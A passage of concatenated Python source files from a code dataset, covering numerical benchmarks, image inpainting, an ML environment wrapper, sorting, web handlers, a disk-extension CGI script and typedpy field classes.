solve_triangular(a, b):\n from scipy.linalg import solve_triangular\n from numpy import transpose\n\n b = transpose(b)\n b = solve_triangular(a, b, lower=True)\n b = transpose(b)\n return b\n\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=list)\ndef gemm(alpha, a, b, c, beta):\n from scipy.linalg.blas import dgemm\n from numpy import transpose\n\n b = transpose(b)\n c = dgemm(alpha, a, b, c=c, beta=beta)\n return c\n\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=list)\ndef syrk(a, b):\n from scipy.linalg.blas import dsyrk\n\n alpha = -1.0\n beta = 1.0\n b = dsyrk(alpha, a, c=b, beta=beta, lower=True)\n return b\n\n\n############################################\n# BLOCK HANDLING FUNCTIONS\n############################################\n\ndef join_matrix(a):\n joint_matrix = np.matrix([[]])\n for i in range(0, len(a)):\n current_row = a[i][0]\n for j in range(1, len(a[i])):\n current_row = np.bmat([[current_row, a[i][j]]])\n if i == 0:\n joint_matrix = current_row\n else:\n joint_matrix = np.bmat([[joint_matrix], [current_row]])\n\n return np.matrix(joint_matrix)\n\n\ndef check_result(result, result_expected):\n is_ok = np.allclose(result, result_expected)\n print(\"Result check status: \" + str(is_ok))\n\n if not is_ok:\n raise Exception(\"Result does not match expected result\")\n\n\n############################################\n# MAIN\n############################################\n\nif __name__ == \"__main__\":\n # Import libraries\n import time\n\n # Parse arguments\n import sys\n\n args = sys.argv[1:]\n MSIZE = int(args[0])\n BSIZE = int(args[1])\n\n # Log arguments if required\n if __debug__:\n print(\"Running cholesky application with:\")\n print(\" - MSIZE = \" + str(MSIZE))\n print(\" - BSIZE = \" + str(BSIZE))\n\n # Initialize matrix\n if __debug__:\n print(\"Initializing matrix\")\n start_time = time.time()\n A = generate_matrix(MSIZE, BSIZE)\n compss_barrier()\n\n # Begin computation\n if __debug__:\n print(\"Performing computation\")\n cholesky_start_time = time.time()\n cholesky_blocked(A, MSIZE, BSIZE)\n compss_barrier(True)\n end_time = time.time()\n\n # Log results and time\n if __debug__:\n print(\"Post-process results\")\n total_time = end_time - start_time\n init_time = cholesky_start_time - start_time\n cholesky_time = end_time - cholesky_start_time\n\n print(\"RESULTS -----------------\")\n print(\"VERSION USERPARALLEL\")\n print(\"MSIZE \" + str(MSIZE))\n print(\"BSIZE \" + str(BSIZE))\n print(\"DEBUG \" + str(__debug__))\n print(\"TOTAL_TIME \" + str(total_time))\n print(\"INIT_TIME \" + str(init_time))\n print(\"CHOLESKY_TIME \" + str(cholesky_time))\n print(\"-------------------------\")\n","sub_path":"examples/cholesky/userparallel/cholesky.py","file_name":"cholesky.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"397421173","text":"# # # # # # # # # # # HEADER # # # # # # # # # # #\n# #\n# STUDENT: Amanda Carrijo Viana Figur #\n# N. USP: 8937736 #\n# STUDENT: Luiz Augusto Vieira Manoel #\n# N. 
USP: 8937308                        #\n# COURSE: Mestrado em Ciências de Computação e    #\n#         Matemática Computacional (PPG-CCMC)     #\n# YEAR OF ENTRY: 2020/2019                        #\n# \t           FINAL PROJECT\t\t   #\n# \t       INPAINTING POPULAR\t\t   #\n#                                                 #\n# # # # # # # # # # # # # # # # # # # # # # # # # ##\n\nimport imageio\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom skimage import morphology as morp # implements the morphology functions\nfrom plot_compare import plot_compare\nimport sys\n\n#Searches each input_img pixel until it finds white mask pixels\ndef inpainting_popular(input_img, mask):\n\n\tN, M = input_img.shape[0:2]\n\tr = input_img.copy()\n\tfor i in range(0, N):\n\t\tfor j in range(0, M):\n\t\t\tif mask[i,j,0] == 255:\n\t\t\t\tinpainting_search(r, mask, i, j)\n\n\treturn r\n\n#Do the inpainting on the pixel\ndef inpainting_search(input_img, mask, i, j):\n\n\tk = 2\n\tinpainted = False\n\n\twhile(not inpainted):\n\n\t\t#The subregion to find pixels outside mask\n\t\tsub_region_base = morp.disk(k)\n\n\t\t#Generates a subregion of size 2k + 1 around pixel to be inpainted\n\t\tsub_region_input = input_img[i - k: i + k + 1, j - k:j + k + 1]\n\t\tsub_region_mask = mask[i - k: i + k + 1, j - k:j + k + 1]\n\n\t\t#searches every pixel of the subregion\n\t\tfor x in range(0, ((2*k) +1)):\n\t\t\tfor y in range(0, ((2*k) +1)):\n\t\t\t\t#if pixel is inside sub_region_base and outside mask, then inpainting occurs\n\t\t\t\tif sub_region_base[x,y] == 1 and sub_region_mask[x,y,0] == 0:\n\t\t\t\t\tinput_img[i,j,:] = sub_region_input[x,y,:] #inpaint respective RGB channels\n\t\t\t\t\tinpainted = True\n\n\t\tk += 1 #keeps searching for adequate subregion","sub_path":"inpanting_popular.py","file_name":"inpanting_popular.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"338526365","text":"from lprec import lpTransform\nimport numpy as np\nimport struct\n\n\ndef test_adj():\n    N = 512\n    Nproj = int(3*N/2)\n    Nslices = 1\n    filter_type = 'None'\n    cor = N / 2\n    interp_type = 'cubic'\n    gpu = 0\n\n    f = np.float32(np.random.random([Nslices, N, N]))\n    R = np.float32(np.random.random([Nslices, Nproj, N]))\n\n    lp = lpTransform.lpTransform(\n        N, Nproj, Nslices, filter_type, cor, interp_type)\n    lp.precompute(1)\n    lp.initcmem(1, gpu)\n\n    Rf = lp.fwd(f, gpu)\n    frec = lp.adj(R, gpu)\n    Rrec = lp.fwd(frec, gpu)\n\n    # scale test\n    RR = lp.fwd(lp.adj(R, gpu), gpu)\n    scale = np.sum(np.float64(R*RR))/np.sum(np.float64(RR*RR))\n\n    # dot product test\n    sum1 = sum(np.float64(np.ndarray.flatten(Rrec)*np.ndarray.flatten(R)))\n    sum2 = sum(np.float64(np.ndarray.flatten(frec)*np.ndarray.flatten(frec)))\n    err = np.linalg.norm(sum1-sum2)/np.linalg.norm(sum2)\n    print([scale, err])\n    return [scale, err]\n\n\nif __name__ == '__main__':\n    test_adj()\n","sub_path":"tests/test_adj.py","file_name":"test_adj.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"271160491","text":"import gym\nimport numpy as np\n\nfrom gym import spaces\nfrom dm_alchemy import symbolic_alchemy\nfrom dm_alchemy.encode import chemistries_proto_conversion\nfrom dm_alchemy.types.utils import ChemistrySeen, ElementContent\n\nLEVEL_NAME = 'alchemy/perceptual_mapping_randomized_with_rotation_and_random_bottleneck'\nCHEM_NAME = 'chemistries/perceptual_mapping_randomized_with_random_bottleneck/chemistries'\n\nclass AlchemyEnv(gym.Env):\n\n    def __init__(self, num_trials=10, num_stones_per_trial=3, 
num_potions_per_trial=12, max_steps_per_trial=20, fixed=False):\n super(AlchemyEnv, self).__init__()\n\n self.num_stones_per_trial = num_stones_per_trial\n self.num_potions_per_trial = num_potions_per_trial\n\n self.seed()\n self.fixed = fixed\n ground_truth = ChemistrySeen(content=ElementContent.GROUND_TRUTH)\n if self.fixed:\n chems = chemistries_proto_conversion.load_chemistries_and_items(CHEM_NAME)\n self.env = symbolic_alchemy.get_symbolic_alchemy_fixed(chemistry=chems[0][0], episode_items=chems[0][1], see_chemistries={'task': ground_truth})\n else:\n self.env = symbolic_alchemy.get_symbolic_alchemy_level(level_name=LEVEL_NAME, num_trials=num_trials, num_stones_per_trial=num_stones_per_trial, num_potions_per_trial=num_potions_per_trial, max_steps_per_trial=max_steps_per_trial, see_chemistries={'task': ground_truth})\n\n self._max_episode_steps = self.env.max_steps_per_trial\n self.step_count = 0\n\n obs_dim = num_stones_per_trial * 5 + num_potions_per_trial * 2\n act_dim = 1 + num_stones_per_trial * (1 + num_potions_per_trial)\n self.observation_space = spaces.Box(low=-1, high=2, shape=(obs_dim,))\n self.action_space = spaces.Discrete(act_dim)\n self.task_dim = 28\n\n self.reset_task()\n\n def step(self, action):\n \"\"\"\n Execute one step in the environment.\n Should return: state, reward, done, info\n where info has to include a field 'task'.\n \"\"\"\n if isinstance(action, np.ndarray) and action.ndim == 1:\n action = action[0]\n self.timestep = self.env.step(action)\n\n return self._reduce_obs(self.timestep.observation['symbolic_obs']), self.timestep.reward, self.env.is_new_trial(), {'task': self.timestep.observation['task']}\n\n def reset(self):\n \"\"\"\n Reset the environment. This should *NOT* automatically reset the task!\n Resetting the task is handled in the varibad wrapper (see wrappers.py).\n\n Completed automatically by Alchemy when trial is done.\n \"\"\"\n if not self.env.is_new_trial():\n raise Exception(\"Alchemy reset not on trial boundary.\")\n return self._reduce_obs(self.timestep.observation['symbolic_obs'])\n\n def _reduce_obs(self, obs):\n return obs[np.r_[0:self.num_stones_per_trial*5, 15:15+self.num_potions_per_trial*2]]\n\n def get_task(self):\n \"\"\"\n Return a task description, such as goal position or target velocity.\n \"\"\"\n return self.timestep.observation['task']\n\n def reset_task(self, task=None):\n \"\"\"\n Reset the task, either at random (if task=None) or the given task.\n Should *not* reset the environment.\n \"\"\"\n self.timestep = self.env.reset()\n return self.timestep.observation['task']\n\n # def visualise_behaviour(self,\n # env,\n # args,\n # policy,\n # iter_idx,\n # encoder=None,\n # reward_decoder=None,\n # state_decoder=None,\n # task_decoder=None,\n # image_folder=None,\n # **kwargs):\n # \"\"\"\n # Optional. 
If this is not overwritten, a default visualisation will be used (see utils/evaluation.py).\n    #     Should return the following:\n    #         episode_latent_means, episode_latent_logvars, episode_prev_obs,\n    #         episode_next_obs, episode_actions, episode_rewards, episode_returns\n    #     where each element is either a list of length num_episodes,\n    #     or \"None\" if not applicable.\n    #     \"\"\"\n    #     pass\n","sub_path":"environments/alchemy/alchemy.py","file_name":"alchemy.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"364942445","text":"import logging\nfrom collections import Counter\nfrom enum import Enum\nfrom typing import Dict, List\n\nimport numpy as np\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import make_pipeline\n\nimport torch\nfrom pytorch_pretrained_bert import BertModel, BertTokenizer\n\n\ndef load_embedding(data_path:str) -> Dict[str, List[float]]:\n    ''' load embedding '''\n    with open(data_path) as f:\n        origin_embed = [ii.strip() for ii in f.readlines()]\n    embed = {ii.split(' ')[0]: np.array(ii.split(' ')[1:]).astype(float) for ii in origin_embed}\n    return embed\n\nclass EMBED_TYPE(Enum):\n    FastText = 0\n    Glove = 1\n    BERT = 2\n    ONE_HOT = 3\n    TF_IDF = 4\n\nembedType = EMBED_TYPE.FastText\n\nif embedType == EMBED_TYPE.BERT:\n    bert_dir = '../bert'\n    bert = BertModel.from_pretrained(bert_dir)\n    tokenizer = BertTokenizer.from_pretrained(f'{bert_dir}/uncased_L-24_H-1024_A-16/vocab.txt')\nelif embedType == EMBED_TYPE.Glove or embedType == EMBED_TYPE.FastText:\n    if embedType == EMBED_TYPE.FastText:\n        embed_path = '../wiki-news-300d-1M-subword.vec'\n    else:\n        embed_path = '../glove.840B.300d.txt' \n    embed = load_embedding(embed_path)\n\ndef get_embed(word:str)->List[float]:\n    if word in embed:\n        return embed[word]\n    else:\n        return np.zeros(300)\n\n\ndef cluster_inst_ids_representatives(inst_ids_to_representatives: Dict[str, List[Dict[str, int]]],\n                                     n_clusters: int, disable_tfidf: bool) -> Dict[str, Dict[str, int]]:\n    \"\"\"\n    performs agglomerative clustering on representatives of one SemEval target\n    :param inst_ids_to_representatives: map from SemEval instance id to list of representatives\n    :param n_clusters: fixed number of clusters to use\n    :param disable_tfidf: disable tfidf processing of feature words\n    :return: map from SemEval instance id to soft membership of clusters and their weight\n    \"\"\"\n    inst_ids_ordered = list(inst_ids_to_representatives.keys())\n    lemma = inst_ids_ordered[0].rsplit('.', 1)[0]\n    logging.info('clustering lemma %s' % lemma)\n    representatives = [y for x in inst_ids_ordered for y in inst_ids_to_representatives[x]]\n    n_represent = len(representatives) // len(inst_ids_ordered)\n    to_pipeline = [DictVectorizer()]\n    if embedType == EMBED_TYPE.BERT:\n        waitSentence = [' '.join(ii) for ii in representatives]\n        transformed = []\n        for ii in waitSentence:\n            ids = torch.tensor([tokenizer.convert_tokens_to_ids(tokenizer.tokenize(ii))])\n            transformed.append(bert(ids, output_all_encoded_layers=False)[-1][0].detach().numpy())\n    elif embedType == EMBED_TYPE.Glove or embedType == EMBED_TYPE.FastText:\n        transformed = [sum([get_embed(jj) for jj in ii]) for ii in representatives]\n    else:\n        if embedType == EMBED_TYPE.TF_IDF:\n            to_pipeline.append(TfidfTransformer())\n        data_transformer = make_pipeline(*to_pipeline)\n        transformed = 
data_transformer.fit_transform(representatives).todense()\n    clustering = AgglomerativeClustering(n_clusters=n_clusters, linkage='average', affinity='cosine')\n    clustering.fit(transformed)\n    senses = {}\n    for i, inst_id in enumerate(inst_ids_ordered):\n        inst_id_clusters = Counter(clustering.labels_[i * n_represent: (i + 1) * n_represent])\n        senses[inst_id] = dict([('%s.sense.%d' % (lemma, k), v) for (k, v) in inst_id_clusters.most_common()])\n    return senses\n","sub_path":"spwsi/wsi_clustering.py","file_name":"wsi_clustering.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"419096901","text":"# ----------------------------------------------------------------------------\n# Copyright (c) 2016-2020, QIIME 2 development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# ----------------------------------------------------------------------------\n\nimport unittest\n\nfrom qiime2.plugin.testing import TestPluginBase\nfrom qiime2 import Artifact\n\n\nclass AlignToTreeMafftIqtreePipelineTest(TestPluginBase):\n    package = 'q2_iqtree2.tests'\n\n    def setUp(self):\n        super().setUp()\n        self.align_to_tree_mafft_iqtree = self.plugin.pipelines[\n            'align_to_tree_mafft_iqtree']\n\n        input_sequences_fp = self.get_data_path('dna-sequences-1.fasta')\n        self.input_sequences = Artifact.import_data('FeatureData[Sequence]',\n                                                    input_sequences_fp)\n\n    def test_execution(self):\n        # Does it run?\n        self.align_to_tree_mafft_iqtree(self.input_sequences)\n        self.assertTrue(True)\n\n    def test_outputs(self):\n        result = self.align_to_tree_mafft_iqtree(self.input_sequences)\n        self.assertEqual(4, len(result))\n        aligned_seq, masked_seq, unrooted_tree, rooted_tree = result\n        self.assertEqual('FeatureData[AlignedSequence]', str(aligned_seq.type))\n        self.assertEqual('FeatureData[AlignedSequence]', str(masked_seq.type))\n        self.assertEqual('Phylogeny[Unrooted]', str(unrooted_tree.type))\n        self.assertEqual('Phylogeny[Rooted]', str(rooted_tree.type))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"q2_iqtree2/tests/test_align_to_tree_mafft_iqtree2.py","file_name":"test_align_to_tree_mafft_iqtree2.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"241559857","text":"def make_divisors(n):\n    '''\n    Return a list of the divisors of n (only odd divisors are collected)\n    '''\n    divisors = []\n    for i in range(1, int(n**0.5)+1):\n        if n % i == 0 and i % 2 == 1:\n            divisors.append(i)\n            if i != n // i and n//i % 2 == 1:\n                divisors.append(n//i)\n    # divisors.sort()\n    return divisors\n\n\nN = int(input())\nans = 0\nfor i in range(1, N+1):\n    divisors = make_divisors(i)\n    if len(divisors) == 8:\n        ans += 1\nprint(ans)\n","sub_path":"abc106/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"556276231","text":"\"\"\"\nImplement Quick Sort\n\nDone in two parts. Much in the same way as merge sort.\nMeaning there will be a number of recursive calls using\na helper method that is outside the original function. \n\"\"\"\n\n\"\"\"\nThis pivot function will choose a pivot point. 
And then\nproceed to put everything less then the pivot on one side.\nAnd then proceed to put everything bigger on the other.\nAnd it will do all of this inplace without using another array.\n\"\"\"\ndef pivot(arr, start = 0, end = None):\n if end == None:\n end = len(arr)-1\n\n try:\n pivotp = arr[start]\n except IndexError:\n print(\"YOLO\")\n\n pivotindex = start\n\n for x in range(start+1,len(arr)):\n if pivotp > arr[x]:\n # here if we find something greater then the pivot\n # we increase the pivot index by one. And then proceed\n # to swap the value at the new pivotindex and thing we \n # just found that is crater than the pivotp\n # we started from start+1 so that we will never touch\n # the pivot point in this loop\n pivotindex+=1\n arr[pivotindex], arr[x] = arr[x], arr[pivotindex]\n\n # here at the very end, we do our final swap\n # to put the pivot where it belongs, which is where \n # the pivotindex is pointing to\n arr[start], arr[pivotindex] = arr[pivotindex], arr[start]\n\n # and here the very last thing we do is return the index\n # of the pivot in the array\n return pivotindex\n\n\ndef QuickSort(arr, start = 0, end = None):\n if end == None:\n end = len(arr) - 1\n \n\n\n if start < end:# can not do this since arr size will always be constant - len(arr) != 1:\n pivotIndex = pivot(arr,start,end) # has to be inside base case\n # since what if start > end gets passed to it ?\n # try:\n # pivotp = arr[start]\n # except IndexError:\n # print(\"YOLO\")\n\n # here we are doing the left side of the array\n # everything less then the pivot\n QuickSort(arr,start,pivotIndex-1) #not exactly the pivot index but one less\n # since we only want a subset of the array\n\n # here we are doing the right side of the array\n # everything greater then the pivot\n QuickSort(arr,pivotIndex+1,end) # this calls not have any absolute values\n # these calls can only ever have the information that is pass to it \n # so as whats inside pivotindex and end\n\n return arr\n\n\nif __name__ == \"__main__\":\n print(QuickSort([4,86,2,16,5,7,66,36]))\n","sub_path":"Old/ColtSteele/Sorting/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"200280917","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\n\nfrom azure.cli.core.commands import CliCommandType\nfrom azext_devops.dev.common.exception_handler import azure_devops_exception_handler\nfrom ._format import (transform_work_item_table_output,\n transform_work_item_query_result_table_output)\n\n\nworkItemOps = CliCommandType(\n operations_tmpl='azext_devops.dev.boards.work_item#{}',\n exception_handler=azure_devops_exception_handler\n)\n\n\ndef load_work_commands(self, _):\n with self.command_group('boards', command_type=workItemOps) as g:\n # basic work item commands\n g.command('work-item show', 'show_work_item', table_transformer=transform_work_item_table_output)\n g.command('work-item create', 'create_work_item', table_transformer=transform_work_item_table_output)\n g.command('work-item update', 'update_work_item', table_transformer=transform_work_item_table_output)\n g.command('work-item delete', 'delete_work_item',\n confirmation='Are you sure you want to delete this work item?')\n\n # query commands\n g.command('query', 'query_work_items', table_transformer=transform_work_item_query_result_table_output)\n","sub_path":"azure-devops/azext_devops/dev/boards/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"523344898","text":"import tornado.web\nimport tornado.ioloop\nimport sqlite3\n\nclass AddWeb(tornado.web.RequestHandler):\n def get(self):\n base = sqlite3.connect(\"../datos.db\")\n\n cursor = base.cursor()\n\n cursor.execute(\"SELECT categoria FROM food\")\n\n data = cursor.fetchall()\n\n categorias = []\n\n for element in data:\n if element[0] not in categorias:\n categorias.append(element[0])\n\n self.render(\"add.html\", categories=categorias)\n\n def post(self):\n base = sqlite3.connect(\"../datos.db\")\n\n cursor = base.cursor()\n\n name = self.get_argument(\"name\")\n quantity = self.get_argument(\"quantity\")\n category = self.get_argument(\"category\")\n\n print(quantity)\n\n quantity = int(quantity)\n\n print(quantity)\n\n try:\n cursor.execute(\"INSERT INTO food(nombre, cantidad, categoria) VALUES(?, ?, ?)\", (name, quantity, category))\n\n except sqlite3.IntegrityError:\n cursor.execute(\"SELECT cantidad FROM food WHERE nombre=?\", (name,))\n\n quantity = cursor.fetchall()[0][0] + quantity\n\n print(quantity)\n\n cursor.execute(\"UPDATE food SET cantidad=? 
WHERE nombre=?\", (quantity, name))\n\n base.commit()\n\n self.get()","sub_path":"server/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18757198","text":"import math\nimport os\nimport sys\nimport imutils\nimport cv2\nfrom google_speech import Speech\nimport tensorflow as tf\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimage_path = sys.argv[1]\n\n# image = cv2.imread(image_path)\n# image = imutils.rotate(image, 270)\n# cv2.imwrite('image.jpg', image)\n# # change this as you see fit\n#\n# image_path = \"image.jpg\"\n\n\n# Read in the image_data\nimage_data = tf.gfile.FastGFile(image_path, 'rb').read()\n\n# Loads label file, strips off carriage return\nlabel_lines = [line.rstrip() for line\n in tf.gfile.GFile(\"retrained_labels.txt\")]\n\n# Unpersists graph from file\nwith tf.gfile.FastGFile(\"retrained_graph.pb\", 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n tf.import_graph_def(graph_def, name='')\n\nwith tf.Session() as sess:\n # Feed the image_data as input to the graph and get first prediction\n softmax_tensor = sess.graph.get_tensor_by_name('final_result:0')\n\n predictions = sess.run(softmax_tensor,\n {'DecodeJpeg/contents:0': image_data})\n\n # Sort to show labels of first prediction in order of confidence\n top_k = predictions[0].argsort()[-len(predictions[0]):][::-1]\n\n speak_string = \"This looks like Rupees \"\n # Display the predicted result\n for node_id in top_k[0:1]:\n human_string = label_lines[node_id]\n score = predictions[0][node_id]\n speak_string = speak_string + str(human_string) + \" probability is \"\n format_score = score * 100\n format_score = math.ceil(format_score * 100) / 100\n speak_string = speak_string + str(format_score)\n print('%s (score = %.5f)' % (human_string, format_score))\n # os.system(\"google_speech -l en \" + speak_string)\n speech = Speech(speak_string, lang=\"en\")\n sox_effects = (\"speed\", \"1\")\n speech.play(sox_effects)\n","sub_path":"classify_note/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"170996331","text":"#!/usr/bin/python36\t\t\nprint(\"content-type:text/html\")\nprint(\"\\n\")\n\nimport subprocess as sp\nimport cgitb\nimport pymysql\npymysql.install_as_MySQLdb()\nimport MySQLdb\ncgitb.enable()\n\n\ndb = MySQLdb.connect(host=\"localhost\",user=\"root\",passwd=\"7742Jain!!\",db=\"PROJECT\")\ncur = db.cursor()\n\ncur.execute(\"select name from disc\")\nres = cur.fetchall()\ndisc = res[0][0]\n\n\npartition = sp.getstatusoutput(\"sudo echo -e 'n\\np\\n1\\n\\n\\n\\nw' | sudo fdisk /dev/{}\".format(disc))\t\nif partition[0] == 0:\n\t\n\tsp.getstatusoutput(\"sudo partprobe\")\nelse:\n\tprint(\"Failed to extend the Disk Storage System.
Check system logs for more details!\")\n\texit()\n\n\npvcreate = sp.getstatusoutput(\"sudo pvcreate /dev/{}1 -f\".format(disc))\nif pvcreate[0] == 0:\n\tprint(pvcreate[1], \"<br>\")\nelse:\n\tprint(pvcreate, \"<br>\")\n\tprint(\"Failed to create PV\")\n\texit()\n\n\nvgextend = sp.getstatusoutput(\"sudo vgextend {} /dev/{}1 -f\".format('staas', disc))\nif vgextend[0] == 0:\n\tprint(vgextend[1], \"<br>\")\nelse:\n\tprint(vgextend)\n\tprint(\"Failed in VG extension\")\n\texit()\n\ncur.execute(\"delete from disc where name = '{}'\".format(disc))\nprint(\"<br><br>
Successfully added space!\")\ndb.commit()\ndb.close()\n","sub_path":"Client/vgextend.py","file_name":"vgextend.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610282400","text":"\"\"\"\nDefinitions of various types of fields. Supports JSON draft4 types.\n\"\"\"\nimport enum\nimport re\nfrom abc import ABC\nfrom collections import OrderedDict\nfrom copy import deepcopy\nfrom functools import reduce\nfrom decimal import Decimal, InvalidOperation\n\nfrom typedpy.structures import (\n Field,\n Structure,\n TypedField,\n ClassReference,\n StructMeta,\n is_function_returning_field,\n)\n\n\ndef _map_to_field(item):\n if isinstance(item, StructMeta) and not isinstance(item, Field):\n return ClassReference(item)\n if item in [None, \"\"] or isinstance(item, Field):\n return item\n elif Field in getattr(item, \"__mro__\", []):\n return item()\n else:\n raise TypeError(\"Expected a Field/Structure class or Field instance\")\n\n\ndef wrap_val(v):\n return \"'{}'\".format(v) if isinstance(v, str) else v\n\n\nclass StructureReference(Field):\n \"\"\"\n A Field that is an embedded structure within other structure. Allows to create hierarchy.\n This is useful if you want to inline your Structure, as opposed to create an explicit\n class for it.\n All the arguments are passed as attributes of the structure. Example:\n\n .. code-block:: python\n\n StructureReference(\n _additionalProperties = False,\n id = String,\n name = String\n age = AnyOf[PositiveInt, PositiveFloat]\n )\n\n\n Important: Since Typedpy dynamically creates an internal class for it, this field cannot be pickled!\n \"\"\"\n\n counter = 0\n\n def __init__(self, **kwargs):\n classname = \"StructureReference_\" + str(StructureReference.counter)\n StructureReference.counter += 1\n\n self._newclass = type(classname, (Structure,), kwargs)\n super().__init__(kwargs)\n\n def __set__(self, instance, value):\n if not (isinstance(value, (dict, Structure))):\n raise TypeError(\n \"{}: Expected a dictionary or Structure; got {}\".format(\n self._name, value\n )\n )\n extracted_values = (\n {k: v for (k, v) in value.__dict__.items() if k != \"_instantiated\"}\n if isinstance(value, (Structure,))\n else value\n )\n newval = self._newclass(**extracted_values)\n super().__set__(instance, newval)\n\n def __serialize__(self, value):\n raise TypeError(\"{}: StructuredReference Cannot be pickled\".format(self._name))\n\n def __str__(self):\n props = []\n for k, val in sorted(self._newclass.__dict__.items()):\n if val is not None and not k.startswith(\"_\"):\n props.append(\"{} = {}\".format(k, str(val)))\n\n propst = \". Properties: {}\".format(\", \".join(props)) if props else \"\"\n return \"\".format(propst)\n\n\nclass ImmutableField(Field):\n _immutable = True\n\n\nclass Number(Field):\n \"\"\"\n Base class for numerical fields. 
Based on Json schema draft4.\n Accepts and int or float.\n\n Arguments:\n multipleOf(int): optional\n The number must be a multiple of this number\n minimum(int or float): optional\n value cannot be lower than this number\n maximum(int or float): optional\n value cannot be higher than this number\n exclusiveMaximum(bool): optional\n marks the maximum threshold above as exclusive\n\n \"\"\"\n\n def __init__(\n self,\n *args,\n multiplesOf=None,\n minimum=None,\n maximum=None,\n exclusiveMaximum=None,\n **kwargs\n ):\n self.multiplesOf = multiplesOf\n self.minimum = minimum\n self.maximum = maximum\n self.exclusiveMaximum = exclusiveMaximum\n super().__init__(*args, **kwargs)\n\n @staticmethod\n def _validate_static(self, value):\n def is_number(val):\n return isinstance(val, (float, int, Decimal))\n\n def err_prefix():\n return (\n \"{}: Got {}; \".format(self._name, wrap_val(value)) if self._name else \"\"\n )\n\n if not is_number(value):\n raise TypeError(\"{}Expected a number\".format(err_prefix()))\n if (\n isinstance(self.multiplesOf, float)\n and int(value / self.multiplesOf) != value / self.multiplesOf\n or isinstance(self.multiplesOf, int)\n and value % self.multiplesOf\n ):\n raise ValueError(\n \"{}Expected a a multiple of {}\".format(err_prefix(), self.multiplesOf)\n )\n if (is_number(self.minimum)) and self.minimum > value:\n raise ValueError(\n \"{}Expected a minimum of {}\".format(err_prefix(), self.minimum)\n )\n if is_number(self.maximum):\n if self.exclusiveMaximum and self.maximum == value:\n raise ValueError(\n \"{}Expected a maximum of less than {}\".format(\n err_prefix(), self.maximum\n )\n )\n else:\n if self.maximum < value:\n raise ValueError(\n \"{}Expected a maximum of {}\".format(err_prefix(), self.maximum)\n )\n\n def _validate(self, value):\n Number._validate_static(self, value)\n\n def __set__(self, instance, value):\n if not getattr(instance, \"_skip_validation\", False):\n self._validate(value)\n super().__set__(instance, value)\n\n\nclass Integer(TypedField, Number):\n \"\"\"\n An extension of :class:`Number` for an integer. Accepts int\n \"\"\"\n\n _ty = int\n\n def _validate(self, value):\n super()._validate(value)\n Number._validate_static(self, value)\n\n\nclass DecimalNumber(Number):\n \"\"\"\n An extension of :class:`Number` for a Decimal. Accepts anything that can be converted to a Decimal\n \"\"\"\n\n def __set__(self, instance, value):\n try:\n value = Decimal(value)\n except TypeError as ex:\n raise TypeError(\"{}: {}\".format(self._name, ex.args[0]))\n except InvalidOperation as ex:\n raise ValueError(\"{}: {}\".format(self._name, ex.args[0]))\n\n super().__set__(instance, value)\n\n\nclass StructureClass(TypedField):\n _ty = StructMeta\n\n\nclass String(TypedField):\n \"\"\"\n A string value. 
Accepts input of `str`\n\n Arguments:\n minLength(int): optional\n minimal length\n maxLength(int): optional\n maximal lengthr\n pattern(str): optional\n string of a regular expression\n\n \"\"\"\n\n _ty = str\n\n def __init__(self, *args, minLength=None, maxLength=None, pattern=None, **kwargs):\n self.minLength = minLength\n self.maxLength = maxLength\n self.pattern = pattern\n if self.pattern is not None:\n self._compiled_pattern = re.compile(self.pattern)\n super().__init__(*args, **kwargs)\n\n def _validate(self, value):\n String._validate_static(self, value)\n\n @staticmethod\n def _validate_static(self, value):\n def err_prefix():\n return (\n \"{}: Got {}; \".format(self._name, wrap_val(value)) if self._name else \"\"\n )\n\n if not isinstance(value, str):\n raise TypeError(\"{}Expected a string\".format(err_prefix()))\n if self.maxLength is not None and len(value) > self.maxLength:\n raise ValueError(\n \"{}Expected a maximum length of {}\".format(err_prefix(), self.maxLength)\n )\n if self.minLength is not None and len(value) < self.minLength:\n raise ValueError(\n \"{}Expected a minimum length of 